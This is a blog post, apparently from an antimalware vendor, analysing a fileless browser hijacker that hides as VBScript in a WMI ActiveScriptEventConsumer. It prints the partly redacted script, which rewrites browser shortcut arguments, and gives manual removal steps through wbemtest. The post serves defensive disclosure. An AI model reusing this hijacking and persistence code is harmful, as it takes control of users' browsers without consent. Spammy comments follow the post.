Sunday, April 24, 2016 Fileless Browser Hijacker

Recently, we discovered browser hijacker altering shortcuts by inserting argument. When you open your browser, instead of your favorite search engine, you will be presented with this one:

This is nothing new when it comes to browser hijacking, I would say it's well-known trick, but I was fascinated by how this malware works and the idea they came up with to stay undetected by altering your shortcuts over and over again after cleaning.

This so-called fileless malware lives inside WMI (Windows Management Instrumentation) or more precisely, as a Visual Basic script inside ActiveScriptEventConsumer class.

The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder in %system32%\wbem\scrcons.exe. Of course, this makes the script hard to detect since it uses a not-so-common WMI application scrcons.exe rather than the traditional JS application wscript.exe.

Windows built-in application wbemtest.exe or WMIExplorer can be used to access this script.

Below is the content of VBScript used to hijack browsers:
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = ""
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
 BrowserDic.Add LCase(browser), browser
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\Rafael\Desktop"
FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
 For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
   End If
  End If
createobject("").run "cmd /c taskkill /f /im scrcons.exe", 0

As you can see, malware is able to hijack 14 different browsers by checking their executables:


Zemana AntiMalware removes this malware and cleans altered shortcuts.

Manual removal

The manual removal of this malware isn't hard at all.
  • Press Windows button + R on your keyboard at the same time. Type wbemtest and click OK.

  • Windows Management Instrumentation Tester window will open. Click Connect.

  • Type root\subscription exactly like on the image below:

  • Click Open Class on the next window and type ActiveScriptEventConsumer.

  • Now you need to click Instances.

  • And then to finally remove this malware:

Only thing left is to remove argument from your browser shortcuts.
  • Right click on desired shortcut and select Properties.
  • Remove argument after "
  • Click OK to apply changes.

Save yourself the hassle and install Zemana AntiMalware.

Additional Information:

Md5: a718bf376567abd3e7de06f31b036405
VirusTotal: Yeabests installer



  1. You just saved my day! Thanks!

  2. Trojan steed contaminations have dependably been a danger that made repulsiveness among web clients and this is for the most part since they were made for the fundamental reason for permitting outsiders and programmers access to any framework and thus may turn out to be more destructive than infection programs. my review here

  3. A particular element of the thieves is that they take the client's program under full control, and don't leave him a shot. The program changes the settings of the program, the default internet searcher and uncovered its own landing page.